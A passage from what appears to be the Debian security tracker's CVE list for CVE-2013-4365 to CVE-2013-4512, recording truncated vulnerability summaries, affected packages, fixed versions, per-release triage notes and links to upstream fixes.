https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=c2c65cd2e14ada6de44cb527e7f1990bede24e15 NOTE: Not enabled in Debian kernels; staging drivers are not supported CVE-2013-4512 (Buffer overflow in the exitcode_proc_write function in arch/um/kernel/ ...) {DSA-2906-1} - linux 3.11.8-1 (low) - linux-2.6 (low) [wheezy] - linux 3.2.53-1 NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=201f99f170df14ba52ea4c52847779042b7a623b CVE-2013-4511 (Multiple integer overflows in Alchemy LCD frame-buffer drivers in the ...) {DSA-2906-1} - linux 3.11.8-1 - linux-2.6 [wheezy] - linux 3.2.53-1 NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=7314e613d CVE-2013-4510 (Directory traversal vulnerability in the client in Tryton 3.0.0, as di ...) {DSA-2791-1} - tryton-client 2.8.4-1 NOTE: https://bugs.tryton.org/issue3446 CVE-2013-4509 (The default configuration of IBUS 1.5.4, and possibly 1.5.2 and earlie ...) - mozc 1.12.1599.102-1 (low; bug #729065) [wheezy] - mozc (Only in combination with Ibus 1.5.4, which is not in stable) - ibus-anthy 1.5.4-1 (low; bug #729065) [wheezy] - ibus-anthy (Only in combination with Ibus 1.5.4, which is not in stable) [squeeze] - ibus-anthy (Only in combination with Ibus 1.5.4, which is not in oldstable) - ibus-pinyin 1.5.0-1 (low; bug #729065) [wheezy] - ibus-pinyin (Only in combination with Ibus 1.5.4, which is not in stable) [squeeze] - ibus-pinyin (Only in combination with Ibus 1.5.4, which is not in oldstable) - ibus-chewing 1.4.3-4 (low; bug #730781) [wheezy] - ibus-chewing (Only in combination with Ibus 1.5.4, which is not in stable) [squeeze] - ibus-chewing (Only in combination with Ibus 1.5.4, which is not in oldstable) NOTE: https://www.openwall.com/lists/oss-security/2013/11/04/2 NOTE: This is rather a bug in the various IBus engines not in ibus itself, asked maintainers to investigate affected engines, NOTE: can be assigned to affected engines once more info is available NOTE: Introduced in 1.5, so stable/oldstable not affected CVE-2013-4508 (lighttpd before 1.4.34, when SNI is enabled, configures weak SSL ciphe ...) {DSA-2795-1} - lighttpd 1.4.33-1+nmu1 (bug #729453) NOTE: http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2013_01.txt NOTE: http://redmine.lighttpd.net/issues/2525 CVE-2013-4507 (Cross-site scripting (XSS) vulnerability in CollectiveAccess Providenc ...) NOT-FOR-US: CollectiveAccess CVE-2013-4506 RESERVED CVE-2013-4505 (The is_this_legal function in mod_dontdothat for Apache Subversion 1.4 ...) - subversion 1.7.14-1 (bug #730541; unimportant) NOTE: Not built in the binary packages CVE-2013-4504 (The Monster Menus module 7.x-1.x before 7.x-1.15 allows remote attacke ...) NOT-FOR-US: Drupal contrib module CVE-2013-4503 (Cross-site scripting (XSS) vulnerability in the Feed Element Mapper mo ...) NOT-FOR-US: Drupal contrib module CVE-2013-4502 (The FileField Sources module 6.x-1.x before 6.x-1.9 and 7.x-1.x before ...) NOT-FOR-US: Drupal contrib module CVE-2013-4501 (The default views in the Quiz module 6.x-4.x before 6.x-4.5 for Drupal ...) NOT-FOR-US: Drupal contrib module CVE-2013-4500 (The Quiz module 6.x-4.x before 6.x-4.5 for Drupal allows remote authen ...) NOT-FOR-US: Drupal contrib module CVE-2013-4499 (Cross-site scripting (XSS) vulnerability in the Bean module 7.x-1.x be ...) NOT-FOR-US: Drupal contrib module CVE-2013-4498 (The Spaces OG submodule in the Spaces module 6.x-3.x before 6.x-3.7 fo ...) NOT-FOR-US: Drupal contrib module CVE-2013-4497 (The XenAPI backend in OpenStack Compute (Nova) Folsom, Grizzly, and Ha ...) - nova 2013.2-1 [wheezy] - nova (OpenStack Essex is not affected) NOTE: https://bugs.launchpad.net/nova/+bug/1073306 NOTE: https://github.com/openstack/nova/commit/ba0d007fb78bd1182c3c0b808dbd7ccc84640e80 NOTE: https://bugs.launchpad.net/nova/+bug/1202266 NOTE: https://github.com/openstack/nova/commit/5cced7a6dd32d231c606e25dbf762d199bf9cca7 CVE-2013-4496 (Samba 3.x before 3.6.23, 4.0.x before 4.0.16, and 4.1.x before 4.1.6 d ...) - samba 2:4.1.6+dfsg-1 (low) [wheezy] - samba 2:3.6.6-6+deb7u3 [squeeze] - samba (Minor issue) - samba4 [wheezy] - samba4 4.0.0~beta2+dfsg1-3.2+deb7u1 NOTE: http://www.samba.org/samba/security/CVE-2013-4496 CVE-2013-4495 (The send_the_mail function in server/svr_mail.c in Terascale Open-Sour ...) {DSA-2796-1} - torque 2.4.16+dfsg-1.3 (bug #729333) CVE-2013-4494 (Xen before 4.1.x, 4.2.x, and 4.3.x does not take the page_alloc_lock a ...) {DSA-3006-1} - xen 4.4.0-1 [squeeze] - xen (Unsupported in squeeze-lts) CVE-2013-4493 RESERVED CVE-2013-4492 (Cross-site scripting (XSS) vulnerability in exceptions.rb in the i18n ...) {DSA-2830-1} - ruby-i18n 0.6.9-1 - libi18n-ruby [squeeze] - libi18n-ruby (vulnerable code not present) CVE-2013-4491 (Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view ...) {DSA-2888-1} - rails-4.0 4.0.2+dfsg-1 (bug #731290) - rails-3.2 3.2.16-3+0 - ruby-actionpack-3.2 3.2.16-1 (bug #731288) - ruby-actionpack-2.3 (vulnerable code not present) - rails (Vulnerable code not present) NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-4490 (The SSH key upload feature (lib/gitlab_keys.rb) in gitlab-shell before ...) - gitlab (Fixed before initial release to Debian) CVE-2013-4489 (The Grit gem for Ruby, as used in GitLab 5.2 before 5.4.1 and 6.x befo ...) - gitlab (Fixed before initial release to Debian) CVE-2013-4488 (libgadu before 1.12.0 does not verify X.509 certificates from SSL serv ...) - libgadu (unimportant) NOTE: Intentional design decision CVE-2013-4487 (Off-by-one error in the dane_raw_tlsa in the DANE library (libdane) in ...) - gnutls28 (libdane is not built; original patch for CVE-2013-4466 not applied) - gnutls26 (only 3.1.x and 3.2.x) NOTE: off-by one issue in original fix for CVE-2013-4466 CVE-2013-4486 (Zanata 3.0.0 through 3.1.2 has RCE due to EL interpolation in logging ...) NOT-FOR-US: Zanata CVE-2013-4485 (389 Directory Server 1.2.11.15 (aka Red Hat Directory Server before 8. ...) - 389-ds-base 1.3.2.9-1 (bug #730115) CVE-2013-4484 (Varnish before 3.0.5 allows remote attackers to cause a denial of serv ...) {DSA-2814-1} - varnish 3.0.5-1 (medium; bug #728989) NOTE: https://www.varnish-cache.org/trac/ticket/1367 CVE-2013-4483 (The ipc_rcu_putref function in ipc/util.c in the Linux kernel before 3 ...) - linux 3.11.8-1 (low) [wheezy] - linux 3.2.57-1 - linux-2.6 (low) [squeeze] - linux-2.6 (Minor issue, too intrusive to backport) NOTE: http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6062a8 CVE-2013-4482 (Untrusted search path vulnerability in python-paste-script (aka paster ...) NOT-FOR-US: LuCi CVE-2013-4481 (Race condition in Luci 0.26.0 creates /var/lib/luci/etc/luci.ini with ...) NOT-FOR-US: LuCi CVE-2013-4480 (Red Hat Satellite 5.6 and earlier does not disable the web interface t ...) NOT-FOR-US: Red Hat Satellite CVE-2013-4479 (lib/sup/message_chunks.rb in Sup before 0.13.2.1 and 0.14.x before 0.1 ...) {DSA-2805-1} - sup-mail 0.12.1+git20120407.aaa852f-1+deb7u1 (bug #728232) NOTE: https://github.com/sup-heliotrope/sup/commit/ca0302e0c716682d2de22e9136400c704cc93e42 CVE-2013-4478 (Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers ...) {DSA-2805-1} - sup-mail 0.12.1+git20120407.aaa852f-1+deb7u1 (bug #728232) NOTE: http://rubyforge.org/pipermail/sup-talk/2013-October/004996.html NOTE: https://github.com/sup-heliotrope/sup/commit/8b46cdbfc14e07ca07d403aa28b0e7bc1c544785 CVE-2013-4477 (The LDAP backend in OpenStack Identity (Keystone) Grizzly and Havana, ...) - keystone 2013.2-2 (bug #728233) [wheezy] - keystone (Vulnerable code not present) NOTE: https://bugs.launchpad.net/keystone/+bug/1242855 CVE-2013-4476 (Samba 4.0.x before 4.0.11 and 4.1.x before 4.1.1, when LDAP or HTTP is ...) - samba 2:4.0.11+dfsg-1 (low) [wheezy] - samba (Doesn't provide AD functionality) [squeeze] - samba (Doesn't provide AD functionality) - samba4 (low) [wheezy] - samba4 4.0.0~beta2+dfsg1-3.2+deb7u1 CVE-2013-4475 (Samba 3.2.x through 3.6.x before 3.6.20, 4.0.x before 4.0.11, and 4.1. ...) {DSA-2812-1} - samba 2:4.0.11+dfsg-1 (low) - samba4 (low) [wheezy] - samba4 4.0.0~beta2+dfsg1-3.2+deb7u1 CVE-2013-4474 (Format string vulnerability in the extractPages function in utils/pdfs ...) {DLA-1074-1} - poppler 0.18.4-9 (low; bug #729064) [squeeze] - poppler (pdfseparate not yet present) CVE-2013-4473 (Stack-based buffer overflow in the extractPages function in utils/pdfs ...) {DLA-1074-1} - poppler 0.18.4-9 (low; bug #729064) [squeeze] - poppler (pdfseparate not yet present) CVE-2013-4472 (The openTempFile function in goo/gfile.cc in Xpdf and Poppler 0.24.3 a ...) - poppler (unimportant) - xpdf (unimportant) NOTE: specific to non-*NIX systems CVE-2013-4471 (The Identity v3 API in OpenStack Dashboard (Horizon) before 2013.2 doe ...) - horizon 2013.2-1 [wheezy] - horizon (v3 API introduced in Grizzly) NOTE: https://bugs.launchpad.net/horizon/+bug/1237989 CVE-2013-4470 (The Linux kernel before 3.12, when UDP Fragmentation Offload (UFO) is ...) {DLA-0015-1} - linux 3.11.7-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-48squeeze8 [wheezy] - linux 3.2.53-1 CVE-2013-4469 (OpenStack Compute (Nova) Folsom, Grizzly, and Havana, when use_cow_ima ...) - nova 2013.2-3 (low; bug #728605) [wheezy] - nova (Minor issue) NOTE: CVE for incomplete fix of CVE-2013-2096 CVE-2013-4468 (VICIDIAL dialer (aka Asterisk GUI client) 2.8-403a, 2.7, 2.7RC1, and e ...) NOT-FOR-US: VICIDIAL CVE-2013-4467 (Multiple SQL injection vulnerabilities in the agent interface (agc/) i ...) NOT-FOR-US: VICIDIAL CVE-2013-4466 (Buffer overflow in the dane_query_tlsa function in the DANE library (l ...) - gnutls26 (only 3.1.x and 3.2.x) - gnutls28 (libdane is not built) NOTE: http://www.gnutls.org/security.html#GNUTLS-SA-2013-3 NOTE: Upstream commit for 3.2.x: https://gitlab.com/gnutls/gnutls/commit/ed51e5e53cfbab3103d6b7b85b7ba4515e4f30c3 CVE-2013-4465 (Unrestricted file upload vulnerability in the avatar upload functional ...) NOT-FOR-US: Simple Machines Forum CVE-2013-4464 RESERVED CVE-2013-4463 (OpenStack Compute (Nova) Folsom, Grizzly, and Havana does not properly ...) - nova 2013.2-3 (low; bug #728605) [wheezy] - nova (Minor issue) CVE-2013-4462 (WordPress Portable phpMyAdmin Plugin has an authentication bypass vuln ...) NOT-FOR-US: WordPress plugin CVE-2013-4461 (SQL injection vulnerability in the web interface for cumin in Red Hat ...) NOT-FOR-US: Cumin CVE-2013-4460 (Cross-site scripting (XSS) vulnerability in account_sponsor_page.php i ...) {DSA-3120-1} - mantis (low; bug #727180) [squeeze] - mantis (Unsupported in squeeze-lts) NOTE: http://www.mantisbt.org/bugs/view.php?id=16513 CVE-2013-4459 (LightDM 1.7.5 through 1.8.3 and 1.9.x before 1.9.2 does not apply the ...) - lightdm (Only in combination with guest profile, apparmor and 1.8.x branch) CVE-2013-4458 (Stack-based buffer overflow in the getaddrinfo function in sysdeps/pos ...) {DLA-165-1} - eglibc - glibc 2.18-1 (low; bug #727181) [wheezy] - eglibc 2.13-38+deb7u1 NOTE: https://sourceware.org/ml/libc-alpha/2013-10/msg00733.html NOTE: https://sourceware.org/bugzilla/show_bug.cgi?id=16072 CVE-2013-4457 (The Cocaine gem 0.4.0 through 0.5.2 for Ruby allows context-dependent ...) NOT-FOR-US: Cocaine rubygem CVE-2013-4456 RESERVED CVE-2013-4455 (Katello Installer before 0.0.18 uses world-readable permissions for /e ...) NOT-FOR-US: Katello CVE-2013-4454 (WordPress Portable phpMyAdmin Plugin 1.4.1 has Multiple Security Bypas ...) NOT-FOR-US: WordPress plugin CVE-2013-4453 (Cross-site scripting (XSS) vulnerability in templates/login.php in LDA ...) - ldap-account-manager 4.4-1 (medium; bug #726976) [wheezy] - ldap-account-manager (Minor issue) [squeeze] - ldap-account-manager (Minor issue) CVE-2013-4452 (Red Hat JBoss Operations Network 3.1.2 uses world-readable permissions ...) NOT-FOR-US: JBoss Operation Network CVE-2013-4451 (gitolite commit fa06a34 through 3.5.3 might allow attackers to have un ...) - gitolite (vulnerable code introduced for v3.5.3) - gitolite3 (vulnerable code introduced for v3.5.3) CVE-2013-4450 (The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8. ...) - nodejs 0.10.21~dfsg1-1 (medium) NOTE: https://github.com/joyent/node/commit/085dd30e93da67362f044ad1b3b6b2d997064692 NOTE: http://blog.nodejs.org/2013/10/18/node-v0-10-21-stable/ CVE-2013-4449 (The rwm overlay in OpenLDAP 2.4.23, 2.4.36, and earlier does not prope ...) {DSA-3209-1 DLA-203-1} - openldap 2.4.39-1.1 (low; bug #729367) [wheezy] - openldap (Minor issue) [squeeze] - openldap (Minor issue) NOTE: http://www.openldap.org/its/index.cgi/Incoming?id=7723 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1019490 CVE-2013-4448 REJECTED CVE-2013-4447 (Cross-site scripting (XSS) vulnerability in the API in the Simplenews ...) NOT-FOR-US: Simplenews Drupal contributed module CVE-2013-4446 (The _json_decode function in plugins/context_reaction_block.inc in the ...) NOT-FOR-US: Context Drupal contributed module CVE-2013-4445 (The json rendering functionality in the Context module 6.x-2.x before ...) NOT-FOR-US: Context Drupal contributed module CVE-2013-4444 (Unrestricted file upload vulnerability in Apache Tomcat 7.x before 7.0 ...) - tomcat7 7.0.40-1 [wheezy] - tomcat7 7.0.28-4+deb7u3 NOTE: https://svn.apache.org/viewvc?view=revision&revision=1470435 CVE-2013-4443 REJECTED CVE-2013-4442 (Password Generator (aka Pwgen) before 2.07 uses weak pseudo generated ...) - pwgen 2.07-1 (unimportant; bug #767008) NOTE: /dev/random is universally available, if an attacker can create an environment NOTE: where it's not available that opens a far bigger can of worms CVE-2013-4441 (The Phonemes mode in Pwgen 2.06 generates predictable passwords, which ...) - pwgen (unimportant; bug #726578) NOTE: pwgen is documented to generate memorable passwords, so this is by design CVE-2013-4440 (Password Generator (aka Pwgen) before 2.07 generates weak non-tty pass ...) - pwgen 2.07-1 (unimportant; bug #725507) NOTE: Documented shortcoming CVE-2013-4439 (Salt (aka SaltStack) before 0.15.0 through 0.17.0 allows remote authen ...) - salt 0.17.1+dfsg-1 (bug #726480) CVE-2013-4438 (Salt (aka SaltStack) before 0.17.1 allows remote attackers to execute ...) - salt 0.17.1+dfsg-1 (bug #726480) CVE-2013-4437 (Unspecified vulnerability in salt-ssh in Salt (aka SaltStack) 0.17.0 h ...) - salt 0.17.1+dfsg-1 (bug #726480) CVE-2013-4436 (The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 ...) - salt 0.17.1+dfsg-1 (bug #726480) CVE-2013-4435 (Salt (aka SaltStack) 0.15.0 through 0.17.0 allows remote authenticated ...) - salt 0.17.1+dfsg-1 (bug #726480) CVE-2013-4434 (Dropbear SSH Server before 2013.59 generates error messages for a fail ...) - dropbear 2012.55-1.4 (low; bug #726118) [squeeze] - dropbear (Minor issue) [wheezy] - dropbear (Minor issue) CVE-2013-4433 (Cross-site scripting (XSS) vulnerability in XHProf before 0.9.4 allows ...) - xhprof 0.9.4-1 (bug #726284) CVE-2013-4432 (Mahara before 1.5.13, 1.6.x before 1.6.8, and 1.7.x before 1.7.4 does ...) - mahara (low; bug #727539) [squeeze] - mahara (Minor issue) NOTE: https://bazaar.launchpad.net/~mahara-release/mahara/1.7_STABLE/revision/5831 NOTE: https://gitorious.org/mahara/mahara/commit/0b4952e063f50c001e4c2dfc5749f55258bff952 CVE-2013-4431 (Mahara before 1.5.12, 1.6.x before 1.6.7, and 1.7.x before 1.7.3 does ...) - mahara (low; bug #727552) [squeeze] - mahara (Minor issue) NOTE: https://bazaar.launchpad.net/~mahara-release/mahara/1.7_STABLE/revision/5832 NOTE: https://bazaar.launchpad.net/~mahara-release/mahara/1.5_STABLE/revision/5542 NOTE: https://bugs.launchpad.net/mahara/+bug/1233500 CVE-2013-4430 (Cross-site scripting (XSS) vulnerability in Mahara before 1.5.12, 1.6. ...) - mahara (unimportant; bug #727548) NOTE: https://bazaar.launchpad.net/~mahara-release/mahara/1.7_STABLE/revision/5830 NOTE: https://bugs.launchpad.net/mahara/+bug/1175446 NOTE: Only exploitable during installation CVE-2013-4429 (Mahara before 1.5.12, 1.6.x before 1.6.7, and 1.7.x before 1.7.3 does ...) - mahara (low; bug #727545) NOTE: https://bazaar.launchpad.net/~mahara-release/mahara/1.7_STABLE/revision/5833 NOTE: https://bazaar.launchpad.net/~mahara-release/mahara/1.5_STABLE/revision/5543 NOTE: https://bugs.launchpad.net/mahara/+bug/1211758 [squeeze] - mahara (Minor issue) CVE-2013-4428 (OpenStack Image Registry and Delivery Service (Glance) Folsom, Grizzly ...) - glance 2013.2-1 (bug #726478) [wheezy] - glance (does not have the download_image) CVE-2013-4427 (pyxtrlock before 0.2 does not properly check the return values of the ...) NOT-FOR-US: pyxtrlock CVE-2013-4426 (pyxtrlock before 0.1 uses an incorrect variable name, which allows phy ...) NOT-FOR-US: pyxtrlock CVE-2013-4425 (The DICOM listener in OsiriX before 5.8 and before 2.5-MD, when starti ...) NOT-FOR-US: Osirix CVE-2013-4424 (Multiple cross-site scripting (XSS) vulnerabilities in the GateIn Port ...) NOT-FOR-US: GateIn CVE-2013-4423 (CloudForms stores user passwords in recoverable format ...) NOT-FOR-US: Red Hat CloudForms CVE-2013-4422 (SQL injection vulnerability in Quassel IRC before 0.9.1, when Qt 4.8.5 ...) - quassel 0.9.1-1 [wheezy] - quassel (Issue only relevant if the Qt 4.8.5 fix would be backported) [squeeze] - quassel (qt4-x11 is too old) NOTE: Issue when used with Qt >= 4.8.5 and PostgreSQL >= 8.2 NOTE: http://quassel-irc.org/node/120 NOTE: http://bugs.quassel-irc.org/issues/1244 NOTE: https://github.com/quassel/quassel/commit/aa1008be162cb27da938cce93ba533f54d228869 NOTE: Caused by a change in Qt's postgres driver: NOTE: https://bugreports.qt-project.org/browse/QTBUG-30076 NOTE: https://qt.gitorious.org/qt/qtbase/commit/e3c5351d06ce8a12f035cd0627356bc64d8c334a CVE-2013-4421 (The buf_decompress function in packet.c in Dropbear SSH Server before ...) - dropbear 2012.55-1.4 (low; bug #726019) [squeeze] - dropbear (Minor issue) [wheezy] - dropbear (Minor issue) NOTE: https://hg.ucc.asn.au/dropbear/rev/0bf76f54de6f CVE-2013-4420 (Multiple directory traversal vulnerabilities in the (1) tar_extract_gl ...) {DSA-2863-1} - libtar 1.2.20-2 (bug #731860) CVE-2013-4419 (The guestfish command in libguestfs 1.20.12, 1.22.7, and earlier, when ...) - libguestfs 1:1.22.7-1 [wheezy] - libguestfs 1:1.18.1-1+deb7u3 CVE-2013-4418 REJECTED CVE-2013-4417 REJECTED CVE-2013-4416 (The Ocaml xenstored implementation (oxenstored) in Xen 4.1.x, 4.2.x, a ...) - xen (ocaml version of the xenstore daemon not used in Debian) CVE-2013-4415 (Multiple cross-site scripting (XSS) vulnerabilities in Spacewalk and R ...) NOT-FOR-US: Red Hat Satellite CVE-2013-4414 (Cross-site scripting (XSS) vulnerability in the web interface for cumi ...) NOT-FOR-US: Cumin CVE-2013-4413 (Directory traversal vulnerability in controller/concerns/render_redire ...) NOT-FOR-US: Wicked Ruby Gem CVE-2013-4412 (slim has NULL pointer dereference when using crypt() method from glibc ...) - slim 1.3.6-0.1 (bug #725902) [wheezy] - slim (Only exploitable with eglibc 2.17 and later) [squeeze] - slim (Only exploitable with eglibc 2.17 and later) NOTE: Upstream fix: http://git.berlios.de/cgi-bin/cgit.cgi/slim/commit/?id=fbdfae3b406b1bb6f4e5e440e79b9b8bb8f071f CVE-2013-4411 (Review Board: URL processing gives unauthorized users access to review ...) - reviewboard (bug #653113) CVE-2013-4410 (ReviewBoard: has an access-control problem in REST API ...) - reviewboard (bug #653113) CVE-2013-4409 (An eval() vulnerability exists in Python Software Foundation Djblets 0 ...) - djblets (low; bug #726039) - python-django-djblets (low) [squeeze] - python-django-djblets (Minor issue) NOTE: Fix: https://github.com/djblets/djblets/commit/36cd15763742652ca990f913b44e91c69c707269 CVE-2013-4408 (Heap-based buffer overflow in the dcerpc_read_ncacn_packet_done functi ...) {DSA-2812-1} - samba 2:4.0.13+dfsg-1 - samba4 [wheezy] - samba4 4.0.0~beta2+dfsg1-3.2+deb7u1 CVE-2013-4407 (HTTP::Body::Multipart in the HTTP-Body 1.08, 1.17, and earlier module ...) {DSA-2801-1} - libhttp-body-perl 1.17-2 (bug #721634) [squeeze] - libhttp-body-perl (Vulnerable code introduced in 1.08) CVE-2013-4406 (The Quick Tabs module 6.x-2.x before 6.x-2.2, 6.x-3.x before 6.x-3.2, ...) NOT-FOR-US: Quick Tabs Drupal contributed module CVE-2013-4405 (Multiple cross-site request forgery (CSRF) vulnerabilities in the web ...) NOT-FOR-US: Cumin CVE-2013-4404 (cumin in Red Hat Enterprise MRG Grid 2.4 does not properly enforce use ...) NOT-FOR-US: Cumin CVE-2013-4403 REJECTED CVE-2013-4402 (The compressed packet parser in GnuPG 1.4.x before 1.4.15 and 2.0.x be ...) {DSA-2774-1 DSA-2773-1} - gnupg2 2.0.22-1 (bug #725433) - gnupg 1.4.15-1 (bug #725439) CVE-2013-4401 (The virConnectDomainXMLToNative API function in libvirt 1.1.0 through ...) - libvirt 1.1.4-1 (bug #727101) [squeeze] - libvirt (Introduced in 1.1.0, REMOTE_PROC_CONNECT_DOMAIN_XML_TO|FROM_NATIVE not yet present) [wheezy] - libvirt (Introduced in 1.1.0, REMOTE_PROC_CONNECT_DOMAIN_XML_TO|FROM_NATIVE not yet present) NOTE: http://libvirt.org/git/?p=libvirt.git;a=commit;h=57687fd6bf7f6e1b3662c52f3f26c06ab19dc96c CVE-2013-4400 (virt-login-shell in libvirt 1.1.2 through 1.1.3 allows local users to ...) - libvirt 1.1.4-1 (bug #727101) [squeeze] - libvirt (Introduced in 1.1.2, virt-login-shell not yet present) [wheezy] - libvirt (Introduced in 1.1.2, virt-login-shell not yet present) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1015228#c3 CVE-2013-4399 (The remoteClientFreeFunc function in daemon/remote.c in libvirt before ...) - libvirt 1.1.4-1 [wheezy] - libvirt (Introduced in 1.1.0) [squeeze] - libvirt (Introduced in 1.1.0) CVE-2013-4398 REJECTED CVE-2013-4397 (Multiple integer overflows in the th_read function in lib/block.c in l ...) {DSA-2817-1} - libtar 1.2.20-1 (bug #725938) CVE-2013-4396 (Use-after-free vulnerability in the doImageText function in dix/dixfon ...) {DSA-2784-1} - xorg-server 2:1.14.3-4 CVE-2013-4395 (Simple Machines Forum (SMF) through 2.0.5 has XSS ...) NOT-FOR-US: Simple Machines Forum CVE-2013-4394 (The SetX11Keyboard function in systemd, when PolicyKit Local Authority ...) {DSA-2777-1} - systemd 204-5 (bug #725357) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=862324 NOTE: http://cgit.freedesktop.org/systemd/systemd/commit/?id=0b507b17a760b21e33fc52ff377db6aa5086c680 CVE-2013-4393 (journald in systemd, when the origin of native messages is set to file ...) - systemd 204-5 (bug #725357) [wheezy] - systemd (Vulnerable code not present) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=859104 NOTE: http://cgit.freedesktop.org/systemd/systemd/commit/?id=1dfa7e79a60de680086b1d93fcc3629b463f58bd CVE-2013-4392 (systemd, when updating file permissions, allows local users to change ...) - systemd (unimportant; bug #725357) [wheezy] - systemd (/etc/tmpfiles.d not supported in Wheezy) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=859060 NOTE: only relevant to systems running systemd along with selinux CVE-2013-4391 (Integer overflow in the valid_user_field function in journal/journald- ...) {DSA-2777-1} - systemd 204-5 (bug #725357) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=859051 NOTE: http://cgit.freedesktop.org/systemd/systemd/commit/?id=505b6a61c22d5565e9308045c7b9bf79f7d0517e CVE-2013-4390 (Open redirect vulnerability in the AbstractAuthenticationFormServlet i ...) NOT-FOR-US: Apache Sling CVE-2013-4389 (Multiple format string vulnerabilities in log_subscriber.rb files in t ...) {DSA-2888-1 DSA-2887-1} - rails-4.0 (Only affects 3.x) - ruby-actionmailer-3.2 3.2.16-1 (bug #726576) - ruby-actionmailer-2.3 (Only affects 3.x) - rails (Only affects 3.x) NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2013-4388 (Buffer overflow in the mp4a packetizer (modules/packetizer/mpeg4audio. ...) {DSA-2973-1} - vlc 2.1.0-1 (bug #726528) [squeeze] - vlc (Unsupported in squeeze-lts) NOTE: http://git.videolan.org/?p=vlc.git;a=commitdiff;h=9794ec1cd268c04c8bca13a5fae15df6594dff3e CVE-2013-4387 (net/ipv6/ip6_output.c in the Linux kernel through 3.11.4 does not prop ...) {DLA-0015-1} - linux-2.6 [squeeze] - linux-2.6 2.6.32-48squeeze8 - linux 3.11.5-1 [wheezy] - linux 3.2.53-1 CVE-2013-4386 (Multiple SQL injection vulnerabilities in app/models/concerns/host_com ...) - foreman (bug #663101) CVE-2013-4385 (Buffer overflow in the "read-string!" procedure in the "extras" unit i ...) - chicken 4.8.0.5-1 (bug #724740; low) [wheezy] - chicken (Minor issue) [squeeze] - chicken (Minor issue) NOTE: http://code.call-cc.org/cgi-bin/gitweb.cgi?p=chicken-core.git;a=commit;h=cd1b9775005ebe220ba11265dbf5396142e65f26 CVE-2013-4384 (Cross-site scripting (XSS) vulnerability in Google Site Search module ...) NOT-FOR-US: Drupal module CVE-2013-4383 (Cross-site scripting (XSS) vulnerability in the jQuery Countdown modul ...) NOT-FOR-US: Drupal module CVE-2013-4382 REJECTED CVE-2013-4381 REJECTED CVE-2013-4380 (Cross-site scripting (XSS) vulnerability in the MediaFront module 6.x- ...) NOT-FOR-US: Drupal module CVE-2013-4379 (The Make Meeting Scheduler module 6.x-1.x before 6.x-1.3 for Drupal al ...) NOT-FOR-US: Drupal module CVE-2013-4378 (Cross-site scripting (XSS) vulnerability in HtmlSessionInformationsRep ...) NOT-FOR-US: Javamelody CVE-2013-4377 (Use-after-free vulnerability in the virtio-pci implementation in Qemu ...) - qemu 1.7.0+dfsg-4 [wheezy] - qemu (Introduced in 1.4) [squeeze] - qemu (Introduced in 1.4) - qemu-kvm (Introduced in 1.4) NOTE: patches: http://thread.gmane.org/gmane.comp.emulators.qemu/234440 CVE-2013-4376 (The setgid wrapper libx2go-server-db-sqlite3-wrapper.c in X2Go Server ...) - x2goserver (Fixed with first upload to Debian) NOTE: Fixed by: https://code.x2go.org/gitweb?p=x2goserver.git;a=commitdiff;h=42264c88d7885474ebe3763b2991681ddfcfa69a CVE-2013-4375 (The qdisk PV disk backend in qemu-xen in Xen 4.2.x and 4.3.x before 4. ...) - xen 4.2 [squeeze] - xen (Only affects 4.2 and later) [wheezy] - xen (Only affects 4.2 and later) - qemu 1.7.0+dfsg-1 [jessie] - qemu (Xen in Wheezy uses it's internal copy of qemu) [wheezy] - qemu (Xen in Wheezy uses it's internal copy of qemu) [squeeze] - qemu (vulnerable from version 1.1 onwards) - qemu-kvm (This only affects Qemu in combination with Xen) - xen-qemu-dm-4.0 (Affected code not yet present) NOTE: This is only exploitable in combination with Xen. NOTE: Xen in Squeeze uses a separate source package: xen-qemu-dm-4.0 NOTE: Xen in Wheezy includes qemu NOTE: Xen after Wheezy uses qemu-system-x86 from qemu, marking 4.2 as pseudo fixed CVE-2013-4374 (An insecurity temporary file vulnerability exists in RHQ Mongo DB Drif ...) NOT-FOR-US: RHQ MondoDB Drift Server CVE-2013-4373 (The storeFiles method in JPADriftServerBean in Red Hat JBoss Operation ...) NOT-FOR-US: Red Hat JBoss Operations Network CVE-2013-4372 (Multiple cross-site scripting (XSS) vulnerabilities in Fuse Management ...) NOT-FOR-US: JBoss Fuse CVE-2013-4371 (Use-after-free vulnerability in the libxl_list_cpupool function in the ...) - xen 4.4.0-1 [wheezy] - xen (Vulnerable code only present from 4.2 onwards) [squeeze] - xen (Vulnerable code only present from 4.2 onwards) CVE-2013-4370 (The ocaml binding for the xc_vcpu_getaffinity function in Xen 4.2.x an ...) - xen 4.4.0-1 [wheezy] - xen (Vulnerable code only present from 4.2 onwards) [squeeze] - xen (Vulnerable code only present from 4.2 onwards) CVE-2013-4369 (The xlu_vif_parse_rate function in the libxlu library in Xen 4.2.x and ...) - xen 4.4.0-1 [wheezy] - xen (Vulnerable code only present from 4.2 onwards) [squeeze] - xen (Vulnerable code only present from 4.2 onwards) CVE-2013-4368 (The outs instruction emulation in Xen 3.1.x, 4.2.x, 4.3.x, and earlier ...) {DSA-3006-1} - xen 4.4.0-1 [squeeze] - xen (Unsupported in squeeze-lts) CVE-2013-4367 (ovirt-engine 3.2 running on Linux kernel 3.1 and newer creates certain ...) NOT-FOR-US: ovirt CVE-2013-4366 (http/impl/client/HttpClientBuilder.java in Apache HttpClient 4.3.x bef ...) - httpcomponents-client 4.3.2-1 [wheezy] - httpcomponents-client (vulnerable code not present) NOTE: http://svn.apache.org/r1528614 CVE-2013-4365 (Heap-based buffer overflow in the fcgid_header_bucket_read function in ...) {DSA-2778-1} - 